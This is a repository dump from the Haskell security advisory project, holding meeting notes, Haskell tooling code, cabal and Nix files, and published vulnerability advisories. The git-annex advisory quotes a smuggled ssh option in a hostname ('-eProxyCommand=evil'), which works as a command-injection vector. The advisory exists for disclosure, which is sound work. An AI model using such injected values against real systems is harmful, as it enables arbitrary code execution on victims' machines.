18 | Switched to UTCTime everywhere to avoid unexpected issues [#201](https://github.com/haskell/security-advisories/pull/201). 19 | 20 | ## Snapshots to distribute advisories 21 | 22 | Gautier worked on [#179](https://github.com/haskell/security-advisories/pull/179) to introduce a new export mode to hsec-sync to help downstream user (without git dependency). 23 | 24 | ## Ecosystem Workshop 25 | 26 | Fraser introduced the SRT at the ZuriHac workshop. 27 | 28 | The main issue to tackle is the SBOM (e.g. with SPDX). 29 | 30 | ## 2024 April-June report 31 | 32 | Fraser mostly completed it, we might want to add the slides he has used during ZuriHac Ecosystem Workshop in the repository. 33 | 34 | ## Advisory database 35 | 36 | Additionally, 2 HSEC ID has been reserved for an embargoed vulnerability that we anticipate will be published in Q3. 37 | -------------------------------------------------------------------------------- /meeting-notes/2024-10-02.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-10-02 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-09-04.md 4 | 5 | ## Quarterly report 6 | 7 | Fraser will draft this weekend, and send to list for review. 8 | 9 | ## New SRT members 10 | 11 | Application period closed. There were 4 applications. 12 | Fraser will compile them and share in the coming days. 13 | 14 | ## Hacktoberfest (GitHub) 15 | 16 | - Hécate asks us to put forward some issues. 17 | - `good-first-issue` (or similar) label? 18 | - Let's review the open issues and discuss on-list, then share with Hécate. 19 | 20 | ## Hackage packages release 21 | 22 | - Downstream (`cabal-audit`, `flora`) ask for it (the new `hsec-sync` does not rely on `git`) 23 | - Too much work left to be done on `CVSS 4.0`, it'll be shipped in the next release 24 | 25 | ## Trusted publishing and fuzzing 26 | 27 | - Mihai still to do this prep/proposal. 28 | 29 | ## Prospectus 30 | 31 | - Prospectus of ideas for SRT (or other people working on Haskell security) 32 | will be valuable for HF in asking for funding. 33 | - So, we need to put it together :) 34 | 35 | ## GHC 9.10 support in tools/libs 36 | 37 | - Still waiting on `feed` which does not support base-4.20. 38 | - Probably need to nudge Hackage trustees for a metadata revision. 39 | 40 | ## Outstanding PR review 41 | 42 | - We went through the outstanding PRs in our repo; discussed 43 | what to do with them. 44 | -------------------------------------------------------------------------------- /code/LICENSE.txt: -------------------------------------------------------------------------------- 1 | The code in this directory is copyright 2023, The Haskell Foundation 2 | 3 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 4 | 5 | 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 6 | 7 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 8 | 9 | 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 10 | 11 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 12 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Queries.hs: -------------------------------------------------------------------------------- 1 | module Security.Advisories.Queries 2 | ( listVersionAffectedBy 3 | , listVersionRangeAffectedBy 4 | ) 5 | where 6 | 7 | import Control.Monad.IO.Class (MonadIO) 8 | import Distribution.Types.Version (Version) 9 | import Distribution.Types.VersionRange (VersionRange) 10 | import Validation (Validation(..)) 11 | 12 | import Security.Advisories.Core.Advisory 13 | import Security.Advisories.Filesystem 14 | import Security.Advisories.Parse 15 | 16 | type QueryResult = Validation [(FilePath, ParseAdvisoryError)] [Advisory] 17 | 18 | -- | List the advisories matching a component and a version 19 | listVersionAffectedBy 20 | :: MonadIO m 21 | => FilePath -> ComponentIdentifier -> Version -> m QueryResult 22 | listVersionAffectedBy = listAffectedByHelper isVersionAffectedBy 23 | 24 | -- | List the advisories matching a component and a version range 25 | listVersionRangeAffectedBy 26 | :: (MonadIO m) 27 | => FilePath -> ComponentIdentifier -> VersionRange -> m QueryResult 28 | listVersionRangeAffectedBy = listAffectedByHelper isVersionRangeAffectedBy 29 | 30 | -- | Helper function for 'listVersionAffectedBy' and 'listVersionRangeAffectedBy' 31 | listAffectedByHelper 32 | :: (MonadIO m) 33 | => (ComponentIdentifier -> a -> Advisory -> Bool) -> FilePath -> ComponentIdentifier -> a -> m QueryResult 34 | listAffectedByHelper checkAffectedBy root queryComponent queryVersionish = 35 | fmap (filter (checkAffectedBy queryComponent queryVersionish)) <$> 36 | listAdvisories root 37 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0004.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-2025-0004" 5 | cwe = [23] 6 | capec = [126] 7 | keywords = ["gopher", "path-traversal"] 8 | 9 | aliases = [] 10 | related = [] 11 | 12 | [[affected]] 13 | package = "spacecookie" 14 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" 15 | 16 | declarations = { "Network.Gopher.Util.santinizePath" = ">= 0.2.0.0 && < 1.0", "Network.Gopher.Util.santinizeIfNotUrl" = ">= 0.2.0.0 && < 1.0", "Network.Gopher.Util.sanitizePath" = ">= 1.0.0.0 && < 1.0.0.3", "Network.Gopher.Util.sanitizeIfNotUrl" = ">= 1.0.0.0 && < 1.0.0.3" } 17 | 18 | [[affected.versions]] 19 | introduced = "0.2.0.0" 20 | fixed = "1.0.0.3" 21 | 22 | [[references]] 23 | type = "FIX" 24 | url = "https://github.com/sternenseemann/spacecookie/commit/2854a8a70833e7abdeeff3c02596a6f2a2f35c61" 25 | ``` 26 | 27 | # Broken Path Sanitization in spacecookie Library 28 | 29 | The spacecookie library exposes the functions `sanitizePath` and `sanitizeIfNotUrl` intended to 30 | remove `..` components from paths which can be used to prevent path traversal attacks. Due to 31 | erroneous comparison code, this elimination is not actually performed which has been remedied 32 | in version 1.0.0.3 by properly comparing using `equalFilePath`. 33 | 34 | Any user of those respective functions of any version of spacecookie should upgrade to 1.0.0.3 35 | or later. Note that the spacecookie server executable included in the same package is not affected 36 | by the problem since a separate check would reject any malicious path that gets by `sanitizePath`. 37 | -------------------------------------------------------------------------------- /code/purl/purl.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 3.0 2 | name: purl 3 | version: 0.1.0.0 4 | synopsis: Support for purl (mostly universal package url). 5 | description: 6 | Support for the purl specification: 7 | 8 | license: BSD-3-Clause 9 | author: Gautier DI FOLCO 10 | maintainer: foss@difolco.dev 11 | category: Data 12 | extra-doc-files: CHANGELOG.md, README.md 13 | tested-with: 14 | GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1 15 | 16 | library 17 | exposed-modules: Data.Purl 18 | build-depends: 19 | , base >=4.14 && <5 20 | , aeson >=2.0 && <2.3 21 | , case-insensitive <1.3 22 | , containers >=0.6 && <0.8 23 | , http-types >=0.10.0 && <0.13 24 | , parsec ==3.1.* 25 | , text >=1.2 && <3 26 | 27 | hs-source-dirs: src 28 | default-language: Haskell2010 29 | ghc-options: 30 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 31 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 32 | 33 | test-suite spec 34 | type: exitcode-stdio-1.0 35 | hs-source-dirs: test 36 | main-is: Spec.hs 37 | build-depends: 38 | , base <5 39 | , containers 40 | , purl 41 | , tasty <2 42 | , tasty-hunit <1.0 43 | , text 44 | 45 | default-language: Haskell2010 46 | ghc-options: 47 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 48 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 49 | -------------------------------------------------------------------------------- /code/cvss/test/Spec.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Main where 4 | 5 | import Control.Monad 6 | import Data.Text (Text) 7 | import qualified Security.CVSS as CVSS 8 | import Test.Tasty 9 | import Test.Tasty.HUnit 10 | 11 | main :: IO () 12 | main = defaultMain $ 13 | testCase "Security.CVSS" $ do 14 | forM_ examples $ \(cvssString, score, rating) -> do 15 | case CVSS.parseCVSS cvssString of 16 | Left e -> assertFailure (show e) 17 | Right cvss -> do 18 | CVSS.cvssScore cvss @?= (rating, score) 19 | CVSS.cvssVectorString cvss @?= cvssString 20 | CVSS.cvssVectorStringOrdered cvss @?= cvssString 21 | 22 | examples :: [(Text, Float, CVSS.Rating)] 23 | examples = 24 | [ ("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", 5.8, CVSS.Medium) 25 | , ("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", 6.4, CVSS.Medium) 26 | , ("CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", 3.1, CVSS.Low) 27 | , ("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 6.1, CVSS.Medium) 28 | , ("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", 6.4, CVSS.Medium) 29 | , ("CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", 3.1, CVSS.Low) 30 | , ("CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", 4.0, CVSS.Medium) 31 | , ("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", 9.9, CVSS.Critical) 32 | , ("CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", 4.2, CVSS.Medium) 33 | , ("AV:N/AC:L/Au:N/C:N/I:N/A:C", 7.8, CVSS.High) 34 | , ("AV:N/AC:L/Au:N/C:C/I:C/A:C", 10, CVSS.Critical) 35 | , ("AV:L/AC:H/Au:N/C:C/I:C/A:C", 6.2, CVSS.Medium) 36 | ] 37 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0008.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0008" 4 | cwe = [87] 5 | keywords = ["web", "xss", "historical"] 6 | aliases = ["CVE-2021-46888"] 7 | 8 | [[affected]] 9 | package = "hledger-web" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" 11 | [[affected.versions]] 12 | introduced = "0.24" 13 | fixed = "1.23" 14 | 15 | [[references]] 16 | type = "REPORT" 17 | url = "https://github.com/simonmichael/hledger/issues/1525" 18 | [[references]] 19 | type = "INTRODUCED" 20 | url = "https://github.com/simonmichael/hledger/commit/ec51d28839b2910eea360b1b8c72904b51cf7821" 21 | [[references]] 22 | type = "EVIDENCE" 23 | url = "https://www.youtube.com/watch?v=QnRO-VkfIic" 24 | [[references]] 25 | type = "FIX" 26 | url = "https://github.com/simonmichael/hledger/pull/1663" 27 | 28 | ``` 29 | 30 | # Stored XSS in *hledger-web* 31 | 32 | An issue was discovered in *hledger-web* < 1.23. A Stored Cross-Site 33 | Scripting (XSS) vulnerability exists in `toBloodhoundJson` that 34 | allows an attacker to execute JavaScript by encoding user-controlled 35 | values in a payload with base64 and parsing them with the `atob` 36 | function. 37 | 38 | *hledger-web* forms sanitise obvious JavaScript, but not obfuscated 39 | JavaScript (see [OWASP Filter Evasion Cheat Sheet][cheatsheet]). 40 | This means *hledger-web* instances, especially anonymously-writable 41 | ones like `demo.hledger.org`, could be loaded with malicious 42 | JavaScript to be executed by subsequent visitors. 43 | 44 | [cheatsheet]: https://owasp.org/www-community/xss-filter-evasion-cheatsheet 45 | 46 | Reported by Gaspard Baye and Hamidullah Muslih. Fix by Arsen 47 | Arsenović. 48 | -------------------------------------------------------------------------------- /meeting-notes/2023-05-17.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-05-17 2 | 3 | ## Preview meeting's Action items 4 | 5 | - David: schedule fortnightly meetings in this slot 6 | - David: Contact haskell.org to create the mailing list security-advisories@haskell.org (TODO) 7 | - Fraser: Will create issues based on the contents of these notes to serve as basis for assigning tasks 8 | - David: figure out how to get the Github permissions to happen 9 | 10 | 11 | ## Review open GitHub tickets 12 | 13 | - review open tickets 14 | 15 | 16 | ## License for tool source code 17 | 18 | - Decision: BSD-3-Clause 19 | - Advisories themselves remain under Public Domain 20 | 21 | - Labels for issues PRs: 22 | - ones to add: advisory, tools, operations 23 | 24 | ## Mailing list 25 | 26 | Question from haskell.org admin: "do you want a genuine mailman list that’s like a google group (only members can post), or an “alias list” that’s just an alias that forwards to a specified set of people?" 27 | 28 | - Casey: prefers proper list with archive. Broad agreement. 29 | 30 | ## GitHub automation 31 | 32 | BTW, do we merge PRs manually, or do we use an app/bot such as mergify? 33 | 34 | - FT: I'm for it, but it's not urgent. Get the repo "open for business" first. 35 | 36 | ## Nix 37 | 38 | There was a discussion about using it, but not mandating. 39 | 40 | - Agreed. 41 | - FT has a PR relaxing version bounds and adding CI for GHC 8.10 through 9.6. 42 | - https://github.com/blackheaven/security-advisories/blob/tools/introduce-nix/.github/workflows/nix.yml 43 | 44 | ## The tool 45 | 46 | - Tristan: What is the scope? 47 | - David: The initial idea is "what RustSec does". Please rewrite it to whatever we need. 48 | - FT: conformance checking and conversions (e.g OSV, HTML, RSS) 49 | -------------------------------------------------------------------------------- /flake.lock: -------------------------------------------------------------------------------- 1 | { 2 | "nodes": { 3 | "flake-utils": { 4 | "inputs": { 5 | "systems": "systems" 6 | }, 7 | "locked": { 8 | "lastModified": 1731533236, 9 | "narHash": "sha256-l0KFg5HjrsfsO/JpG+r7fRrqm12kzFHyUHqHCVpMMbI=", 10 | "owner": "numtide", 11 | "repo": "flake-utils", 12 | "rev": "11707dc2f618dd54ca8739b309ec4fc024de578b", 13 | "type": "github" 14 | }, 15 | "original": { 16 | "owner": "numtide", 17 | "repo": "flake-utils", 18 | "type": "github" 19 | } 20 | }, 21 | "nixpkgs": { 22 | "locked": { 23 | "lastModified": 1752950548, 24 | "narHash": "sha256-NS6BLD0lxOrnCiEOcvQCDVPXafX1/ek1dfJHX1nUIzc=", 25 | "owner": "NixOS", 26 | "repo": "nixpkgs", 27 | "rev": "c87b95e25065c028d31a94f06a62927d18763fdf", 28 | "type": "github" 29 | }, 30 | "original": { 31 | "owner": "NixOS", 32 | "ref": "nixos-unstable", 33 | "repo": "nixpkgs", 34 | "type": "github" 35 | } 36 | }, 37 | "root": { 38 | "inputs": { 39 | "flake-utils": "flake-utils", 40 | "nixpkgs": "nixpkgs" 41 | } 42 | }, 43 | "systems": { 44 | "locked": { 45 | "lastModified": 1681028828, 46 | "narHash": "sha256-Vy1rq5AaRuLzOxct8nz4T6wlgyUR7zLU309k9mBC768=", 47 | "owner": "nix-systems", 48 | "repo": "default", 49 | "rev": "da67096a3b9bf56a91d16901293e51ba5b49a27e", 50 | "type": "github" 51 | }, 52 | "original": { 53 | "owner": "nix-systems", 54 | "repo": "default", 55 | "type": "github" 56 | } 57 | } 58 | }, 59 | "root": "root", 60 | "version": 7 61 | } 62 | -------------------------------------------------------------------------------- /meeting-notes/2024-09-04.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-09-04 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-08-21.md 4 | 5 | ## HSEC-2024-0003 - process fix 6 | 7 | - PR [#324](https://github.com/haskell/process/pull/324) published (expect merge and release soon) 8 | - HSEC-2024-0003 advisory update draft PR: [#236](https://github.com/haskell/security-advisories/pull/236) 9 | 10 | ## *Trusted publishing* for Hackage 11 | 12 | - Token workflow 13 | - Hackage supports token authn today, but they are unscoped 14 | - See also PyPI implementation: https://docs.pypi.org/trusted-publishers/ 15 | - Project page references the trusted repo 16 | - GHA uses OIDC to auth to PyPI and get short-lived (minutes) token 17 | - GHA or publishing workflow uses the token to publish new package version. 18 | 19 | ## Roadmap of ecosystem security improvements 20 | 21 | - Man years of effort are already known :) 22 | - We should write it all down in an disgestible form. 23 | - Might make getting funding easier? 24 | - Menu / prospectus 25 | 26 | ### New ideas 27 | 28 | - RTS fuzzing (Mihai) 29 | - or general fuzzing tooling for Haskell programmers 30 | 31 | ## haskell-security-action (GHA) 32 | 33 | - Gautier published draft GHA for detecting security 34 | issues and bumping bounds (using [cabal-audit](https://github.com/MangoIV/cabal-audit/pull/50)) 35 | - GHA draft: https://github.com/blackheaven/haskell-security-action 36 | - Playground: https://github.com/blackheaven/vulnerable-sandbox/ 37 | - Please review and test! 38 | - Still a lot of work on it: correct file name/line, fix propositions, PR creation, etc. 39 | 40 | ## Call for volunteers 41 | 42 | - Jose's draft is good. 43 | - How many: "around two or three more members" 44 | - Closing date: end of September. 45 | - Fraser will be primary collector of submissions 46 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0002.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0002" 4 | cwe = [787] 5 | keywords = ["corruption", "vendored-code", "language-c"] 6 | aliases = ["CVE-2019-12900"] 7 | 8 | [[references]] 9 | type = "DISCUSSION" 10 | url = "https://gnu.wildebeest.org/blog/mjw/2019/08/02/bzip2-and-the-cve-that-wasnt/" 11 | 12 | [[references]] 13 | type = "DISCUSSION" 14 | url = "http://scary.beasts.org/security/CESA-2008-005.html" 15 | 16 | [[references]] 17 | type = "ADVISORY" 18 | url = "https://access.redhat.com/security/cve/cve-2019-12900" 19 | 20 | [[references]] 21 | type = "FIX" 22 | url = "https://sourceware.org/git/?p=bzip2.git;a=commit;h=7ed62bfb46e87a9e878712603469440e6882b184" 23 | 24 | [[affected]] 25 | package = "bzlib" 26 | cvss = "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" 27 | 28 | [[affected.versions]] 29 | introduced = "0.4" 30 | fixed = "0.5.2.0" 31 | 32 | [[affected]] 33 | package = "bz2" 34 | cvss = "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" 35 | 36 | [[affected.versions]] 37 | introduced = "0.1.0.0" 38 | fixed = "1.0.1.1" 39 | 40 | [[affected]] 41 | package = "bzlib-conduit" 42 | cvss = "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" 43 | 44 | [[affected.versions]] 45 | introduced = "0.1.0.0" 46 | fixed = "0.3.0.3" 47 | ``` 48 | 49 | # out-of-bounds write when there are many bzip2 selectors 50 | 51 | A malicious bzip2 payload may produce a memory corruption 52 | resulting in a denial of service and/or remote code execution. 53 | Network services or command line utilities decompressing 54 | untrusted bzip2 payloads are affected. 55 | 56 | Note that the exploitation of this bug relies on an undefined 57 | behavior that appears to be handled safely by current compilers. 58 | 59 | The Haskell libraires are vulnerable when they are built using 60 | the bundled C library source code, which is the default 61 | in most cases. 62 | -------------------------------------------------------------------------------- /code/osv/osv.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 2.4 2 | name: osv 3 | version: 0.2.0.0 4 | 5 | -- A short (one-line) description of the package. 6 | synopsis: 7 | Open Source Vulnerability format 8 | 9 | -- A longer description of the package. 10 | description: 11 | Open Source Vulnerability format. 12 | 13 | -- A URL where users can report bugs. 14 | -- bug-reports: 15 | 16 | -- The license under which the package is released. 17 | license: BSD-3-Clause 18 | author: Haskell Security Response Team 19 | maintainer: security-advisories@haskell.org 20 | 21 | -- A copyright notice. 22 | -- copyright: 23 | category: Data 24 | extra-doc-files: CHANGELOG.md, README.md 25 | 26 | tested-with: 27 | GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1 28 | 29 | library 30 | exposed-modules: 31 | Security.OSV 32 | 33 | build-depends: 34 | , aeson >=2.0.1.0 && <3 35 | , base >=4.14 && <5 36 | , cvss >=0.2 && <0.3 37 | , purl >=0.1 && <0.2 38 | , text >=1.2 && <3 39 | , time >=1.9 && <1.15 40 | 41 | hs-source-dirs: src 42 | default-language: Haskell2010 43 | ghc-options: 44 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 45 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 46 | 47 | test-suite spec 48 | type: exitcode-stdio-1.0 49 | hs-source-dirs: test 50 | main-is: Spec.hs 51 | build-depends: 52 | , base >= 4.14 && < 5 53 | , tasty <2 54 | 55 | default-language: Haskell2010 56 | ghc-options: 57 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 58 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 59 | -------------------------------------------------------------------------------- /meeting-notes/2024-11-27.md: -------------------------------------------------------------------------------- 1 | # Haskell SRT meeting 2024-11-27 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-11-13.md 4 | 5 | Present: Fraser, Gautier, Montez, Tristan 6 | 7 | ## Onboarding 8 | 9 | The new team members have been introduced to the on-going work. 10 | 11 | ## GitHub Open Source Secure Fund 12 | 13 | GitHub opened a program to [fund securisaton of FOSS projects](https://github.blog/news-insights/company-news/announcing-github-secure-open-source-fund/) 14 | until January 7th. 15 | 16 | - Project ideas: 17 | - GitHub integration 18 | - Correct file/line 19 | - Snippet proposition/PR opening 20 | - Hackage 21 | - show known vulnerability info 22 | - vulnerabilities endpoints (publish vulnerability info) 23 | - e.g. `advisories.haskell.org/...` 24 | - [API server (#166)](https://github.com/haskell/security-advisories/issues/166) 25 | - improve the HTML presentation of the advisories 26 | - https://haskell.github.io/security-advisories/advisory/... 27 | 28 | - OSV ask: `human_link` source definition 29 | - https://github.com/haskell/security-advisories/issues/252 30 | - We can already address this - link to e.g. 31 | `https://haskell.github.io/security-advisories/HSEC-xxxx` 32 | - Montez will take this side. 33 | - But we should also improve the HTML presentation in those pages. 34 | - Gautier will take this side. 35 | 36 | - OSV ask: JSON Schema validation 37 | - https://github.com/haskell/security-advisories/issues/251 38 | - JSON schema: 39 | https://github.com/ossf/osv-schema/blob/main/validation/schema.json 40 | - Tristan will take the first look 41 | 42 | - Onboarding 43 | - Follow-up on mailing list membership for Lei and Montez 44 | - Github org membership, sorted now, but Fraser to add this step 45 | to the onboarding docs. 46 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0009.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0009" 4 | cwe = [20, 78] 5 | keywords = ["ssh", "command-injection", "historical"] 6 | aliases = ["CVE-2017-12976"] 7 | related = ["CVE-2017-9800", "CVE-2017-12836", "CVE-2017-1000116", "CVE-2017-1000117"] 8 | 9 | [[affected]] 10 | package = "git-annex" 11 | cvss = "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" 12 | [[affected.versions]] 13 | introduced = "0" 14 | fixed = "6.20170818" 15 | 16 | [[references]] 17 | type = "ADVISORY" 18 | url = "https://git-annex.branchable.com/security/CVE-2017-12976/" 19 | [[references]] 20 | type = "FIX" 21 | url = "http://source.git-annex.branchable.com/?p=source.git;a=commitdiff;h=df11e54788b254efebb4898b474de11ae8d3b471" 22 | ``` 23 | 24 | # *git-annex* command injection via malicious SSH hostname 25 | 26 | *git-annex* was vulnerable to the same class of security hole as 27 | git's **CVE-2017-1000117**. In several cases, `git-annex` parses a 28 | repository URL, and uses it to generate a `ssh` command, with the 29 | hostname to ssh to coming from the URL. If the hostname it parses is 30 | something like `-eProxyCommand=evil`, this could result in arbitrary 31 | local code execution. 32 | 33 | Some details of URL parsing may prevent the exploit working in some 34 | cases. 35 | 36 | Exploiting this would involve the attacker tricking the victim into 37 | adding a remote something like `ssh://-eProxyCommand=evil/blah`. 38 | 39 | One possible avenue for an attacker that avoids exposing the URL to 40 | the user is to use `initremote` with an SSH remote, so embedding the 41 | URL in the *git-annex* branch. Then the victim would enable it with 42 | `enableremote`. 43 | 44 | This was fixed in version **6.20170818**. Now there's a `SshHost` 45 | type that is not allowed to start with a dash, and every invocation 46 | of `git-annex` uses a function that takes a `SshHost`. 47 | -------------------------------------------------------------------------------- /meeting-notes/2024-05-29.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-05-29 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-05-15.md 5 | 6 | ## publishing our tools on Hackage 7 | 8 | - Packages: cvss, osv, hsec-core, hsec-tools, hsec-sync 9 | - FT will upload. Just asking if there are further comments about 10 | version numbers, dep version constraints, etc? 11 | - Co-maintainers - who, and what are your Hackage usernames? 12 | - `gdifolco` 13 | - `TristanCacqueray` 14 | 15 | ## SRT members, moving forward 16 | 17 | - Casey has limited time 18 | - We're at the 1y point, time for a new call? 19 | - Updating the charter: Casey thinks we should expand it to be more 20 | involved with the tooling (within and without ecosystem) 21 | 22 | - Remember the original motivation: supporting enterprise adoption. 23 | - e.g. financial industry - how well do we meet their standards? 24 | - Survey industry users to understand what is lacking? 25 | - [FT] FIPS mode, verified crypto libraries (i.e. back on to 26 | OpenSSL/NSS/etc) 27 | 28 | - What is missing: 29 | - SBOM? ("software provenance") 30 | - Larger discovery effort? 31 | - OSS-Fuzz support? 32 | - OpenSSF best practices: 33 | https://www.bestpractices.dev/en/criteria/0 ? 34 | 35 | - SRT has some context-switching. Should we have separate subgroups 36 | for triage / tool development / etc? 37 | 38 | - We can discuss on list over the coming days, and engage with folks 39 | at ZuriHac to determine the next move. General agreement that we 40 | can/should grow the team. 41 | 42 | - Retirements: Casey will step back. (Thank you for all you've 43 | done!) 44 | 45 | ## YAML advisory has been rejected ([#181](https://github.com/haskell/security-advisories/issues/181)) 46 | 47 | - FT will ask Julian if he is satisfied with this conclusion. 48 | 49 | ## deps.dev 50 | 51 | - FT received message from deps.dev developer at Google. Still need 52 | to follow up. 53 | -------------------------------------------------------------------------------- /docs/reports.md: -------------------------------------------------------------------------------- 1 | # SRT reporting 2 | 3 | The SRT is to report each quarter to update the community on the 4 | activities and plans of the SRT. 5 | 6 | ## Who should write the report? 7 | 8 | The SRT project lead prepares the report (though the task could be 9 | delegated with sufficient notice). It is a good idea to gather 10 | items for the report through the reporting period, so you don't 11 | forget anything significant. 12 | 13 | ## Publishing reports 14 | 15 | The canonical version of each report is committed to this repo under 16 | `/reports/`. 17 | 18 | Each report should also be republished on [Discourse], and added to 19 | the list of reports at https://www.haskell.org/security/ (file a 20 | pull request against 21 | [haskell-infra/www.haskell.org](https://github.com/haskell-infra/www.haskell.org/)). 22 | 23 | Reports for the previous quarter should generally be published in 24 | the first few weeks following that quarter. In some cases we have 25 | delayed a report to include significant new developments, e.g. the 26 | result of a *Call for Volunteers*. 27 | 28 | [Discourse]: https://discourse.haskell.org/ 29 | 30 | ## Report content 31 | 32 | Each report should contain: 33 | 34 | - A preamble explaining what the SRT is and who are its members 35 | (just copy the preamble from the previous report). 36 | 37 | - Statistics about the number of contemporary and historical 38 | advisories added to the advisory database during the reporting 39 | period. Also mention any new or outstanding HSEC ID reservations 40 | (for embargoed issues), and any other significant updates to the 41 | **content** of the advisory DB. 42 | 43 | - Discussion of any significant security incidents during the 44 | reporting period that impacted Haskell infrastructure, the 45 | toolchain, or the library ecosystem. 46 | 47 | - Mention of notable updates to SRT-owned tools and libraries, and 48 | related developments in downstream tooling. 49 | 50 | - Any other news related to Haskell ecosystem security. 51 | -------------------------------------------------------------------------------- /code/hsec-tools/app/Command/Reserve.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE LambdaCase #-} 2 | 3 | module Command.Reserve where 4 | 5 | import Control.Monad (when) 6 | import System.Exit (die) 7 | import System.FilePath ((), (<.>)) 8 | 9 | import Security.Advisories.Git 10 | ( add 11 | , commit 12 | , explainGitError 13 | ) 14 | import Security.Advisories.Core.HsecId 15 | ( placeholder 16 | , printHsecId 17 | , getNextHsecId 18 | ) 19 | import Security.Advisories.Filesystem 20 | ( dirNameAdvisories 21 | , dirNameReserved 22 | , getGreatestId 23 | ) 24 | 25 | import Util (ensureRepo) 26 | 27 | -- | How to choose IDs when creating advisories or 28 | -- reservations. 29 | data IdMode 30 | = IdModePlaceholder 31 | -- ^ Create a placeholder ID (e.g. HSEC-0000-0000). Real IDs 32 | -- will be assigned later. 33 | | IdModeAuto 34 | -- ^ Use the next available ID. This option is more likely to 35 | -- result in conflicts when submitting advisories or reservations. 36 | 37 | data CommitFlag = Commit | DoNotCommit 38 | deriving (Eq) 39 | 40 | runReserveCommand :: Maybe FilePath -> IdMode -> CommitFlag -> IO () 41 | runReserveCommand mPath idMode commitFlag = do 42 | repoPath <- ensureRepo mPath 43 | 44 | hsid <- case idMode of 45 | IdModePlaceholder -> pure placeholder 46 | IdModeAuto -> do 47 | curMax <- getGreatestId repoPath 48 | getNextHsecId curMax 49 | 50 | let 51 | advisoriesPath = repoPath dirNameAdvisories 52 | fileName = printHsecId hsid <.> "md" 53 | filePath = advisoriesPath dirNameReserved fileName 54 | writeFile filePath "" -- write empty file 55 | 56 | when (commitFlag == Commit) $ 